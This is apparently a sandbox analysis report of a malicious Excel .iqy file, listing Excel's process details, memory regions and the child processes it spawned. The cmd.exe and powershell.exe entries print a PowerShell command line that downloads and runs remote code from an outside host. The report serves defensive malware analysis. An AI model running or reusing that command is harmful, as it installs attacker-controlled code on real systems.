76917b219ad5a1ff8229a75eb23c34a9ad1ce98264257d3cca538ac59c49a15f (SHA256)
29082018_64943.iqy
Excel Document
Created at 2018-08-30 14:38:00
Notifications (1/1)
The operating system was rebooted during the analysis.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: excel.exe
1
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\excel.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\EXCEL.EXE" |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:01:12, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:09, Reason: Self Terminated |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9ac |
| Parent PID | 0x680 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A8C
0x
A88
0x
A84
0x
A80
0x
A7C
0x
A78
0x
A74
0x
A70
0x
A6C
0x
A68
0x
A1C
0x
A14
0x
9F0
0x
9D0
0x
9CC
0x
9C8
0x
9C4
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
A90
0x
A94
0x
A98
0x
A9C
0x
AA0
0x
AA4
0x
AB4
0x
AB8
0x
AF0
0x
AF4
0x
B40
0x
B44
0x
B48
0x
B4C
0x
B50
0x
B54
0x
BA8
0x
BAC
0x
BB0
0x
6CC
0x
71C
0x
2E0
0x
574
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00200fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00211fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00236fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00241fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00251fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00261fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x00577fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01d10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d20000 | 0x01d20000 | 0x01d20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d30000 | 0x01d30000 | 0x01d30fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d50000 | 0x01d50000 | 0x01d50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d60fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x01d71fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x01d80000 | 0x01d80fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db | 0x01d90000 | 0x01dacfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001dc0000 | 0x01dc0000 | 0x01e9efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ea0000 | 0x01ea0000 | 0x01ea0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01ec1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001ed0000 | 0x01ed0000 | 0x01ed1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ee0000 | 0x01ee0000 | 0x01ee0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ef0000 | 0x01ef0000 | 0x01ef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f00000 | 0x01f00000 | 0x01f7ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000001f80000 | 0x01f80000 | 0x01f80fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001f90000 | 0x01f90000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x01fa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x02042fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002050000 | 0x02050000 | 0x02067fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002070000 | 0x02070000 | 0x0208efff | Private Memory | rw |
|
|
|
- |
| comdlg32.dll.mui | 0x02090000 | 0x0209cfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x020a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x021affff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x021b0000 | 0x0222efff | Memory Mapped File | r |
|
|
|
- |
| c_1255.nls | 0x02230000 | 0x02240fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002250000 | 0x02250000 | 0x02251fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x02260fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x0236ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02370000 | 0x0263efff | Memory Mapped File | r |
|
|
|
- |
| xlintl32.dll | 0x02640000 | 0x02a29fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002a30000 | 0x02a30000 | 0x02b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b30000 | 0x02b30000 | 0x02b4efff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b50000 | 0x02b50000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c50000 | 0x02c50000 | 0x03042fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x03050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x03060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x03070fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003080000 | 0x03080000 | 0x03081fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003090000 | 0x03090000 | 0x030aefff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000030b0000 | 0x030b0000 | 0x030b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000030c0000 | 0x030c0000 | 0x030c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030d0000 | 0x030d0000 | 0x030e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000030f0000 | 0x030f0000 | 0x030f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003100000 | 0x03100000 | 0x03100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x03124fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003130000 | 0x03130000 | 0x0313ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003140000 | 0x03140000 | 0x03155fff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x03160000 | 0x03163fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003170000 | 0x03170000 | 0x03170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003180000 | 0x03180000 | 0x0327ffff | Private Memory | rw |
|
|
|
- |
| seguisb.ttf | 0x03280000 | 0x032e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x03308fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003310000 | 0x03310000 | 0x03321fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003330000 | 0x03330000 | 0x03346fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003350000 | 0x03350000 | 0x03352fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003360000 | 0x03360000 | 0x03360fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003370000 | 0x03370000 | 0x0346ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003470000 | 0x03470000 | 0x0356ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003570000 | 0x03570000 | 0x03572fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003580000 | 0x03580000 | 0x03582fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003590000 | 0x03590000 | 0x03592fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000035a0000 | 0x035a0000 | 0x035affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000035b0000 | 0x035b0000 | 0x035b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000035c0000 | 0x035c0000 | 0x035cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000035d0000 | 0x035d0000 | 0x03dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03dd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003de0000 | 0x03de0000 | 0x03de0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003df0000 | 0x03df0000 | 0x03eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ef0000 | 0x03ef0000 | 0x03f37fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f40000 | 0x03f40000 | 0x03f40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f50000 | 0x03f50000 | 0x03f50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f60000 | 0x03f60000 | 0x03f60fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f70000 | 0x03f70000 | 0x0406ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x04070000 | 0x0412ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000004130000 | 0x04130000 | 0x04130fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004140000 | 0x04140000 | 0x0423ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004240000 | 0x04240000 | 0x0433ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004340000 | 0x04340000 | 0x04340fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004350000 | 0x04350000 | 0x04350fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004360000 | 0x04360000 | 0x04360fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004370000 | 0x04370000 | 0x04370fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004380000 | 0x04380000 | 0x0447ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004480000 | 0x04480000 | 0x0487ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004880000 | 0x04880000 | 0x0497ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04980fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x04990fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x049a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049b0000 | 0x049b0000 | 0x04a2ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x04a30000 | 0x0535ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005360000 | 0x05360000 | 0x0555ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005560000 | 0x05560000 | 0x0565ffff | Private Memory | rw |
|
|
|
- |
| segoeuisl.ttf | 0x05660000 | 0x056f7fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005700000 | 0x05700000 | 0x0577ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005780000 | 0x05780000 | 0x057c7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000057d0000 | 0x057d0000 | 0x057d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000057e0000 | 0x057e0000 | 0x05bdffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db | 0x05be0000 | 0x05c0ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x05c10000 | 0x05c13fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005c20000 | 0x05c20000 | 0x05c21fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005c30000 | 0x05c30000 | 0x05c31fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005c40000 | 0x05c40000 | 0x05c40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005c50000 | 0x05c50000 | 0x05c50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005c60000 | 0x05c60000 | 0x05d5ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x05d60000 | 0x05dc5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005dd0000 | 0x05dd0000 | 0x05ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005de0000 | 0x05de0000 | 0x061e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000061f0000 | 0x061f0000 | 0x065f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006600000 | 0x06600000 | 0x06a00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006a10000 | 0x06a10000 | 0x06c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006c10000 | 0x06c10000 | 0x0740ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007410000 | 0x07410000 | 0x078cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000078d0000 | 0x078d0000 | 0x07ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000007cd0000 | 0x07cd0000 | 0x084cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000084d0000 | 0x084d0000 | 0x085cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000085d0000 | 0x085d0000 | 0x085d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x085e0000 | 0x085e3fff | Memory Mapped File | r |
|
|
|
- |
| {40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db | 0x085f0000 | 0x085f0fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x08600000 | 0x08603fff | Memory Mapped File | r |
|
|
|
- |
|
For performance reasons, the remaining 382 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Local Time, time = 2018-08-30 19:10:03 (Local Time) |
|
1 |
Process #2: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\"http://ms365box.com/update.2\")) |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:02:04, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Self Terminated |
| Monitor Duration | 00:00:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbe0 |
| Parent PID | 0x9ac (c:\program files\microsoft office\office15\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00190000 | 0x001f6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00707fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x00890fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x01c9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ca0000 | 0x01ca0000 | 0x01fe2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01ff0000 | 0x022befff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a030000 | 0x4a088fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77930000 | 0x77a4efff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a50000 | 0x77b49fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77b50000 | 0x77cf8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee9e10000 | 0x7fee9e17fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd20000 | 0x7fefdd8afff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefde70000 | 0x7fefde7dfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7fefde80000 | 0x7fefdf1efff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefe1e0000 | 0x7fefe20dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefe210000 | 0x7fefe276fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefe300000 | 0x7fefe408fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feffd70000 | 0x7feffe38fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffe70000 | 0x7feffe70fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aDU0VK IWA5kLS\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xbf8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a030000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77930000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CMD.EXE, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77946d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x779423d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77938290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x779417e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-08-30 14:40:03 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 178683 |
|
1 |
Environment (18)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aDU0VK IWA5kLS\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #3: powershell.exe
676
41
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\"http://ms365box.com/update.2\")) |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:02:06, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Self Terminated |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf8 |
| Parent PID | 0xbe0 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BFC
0x
810
0x
4E4
0x
768
0x
79C
0x
4D0
0x
824
0x
820
0x
81C
0x
5C8
0x
68C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
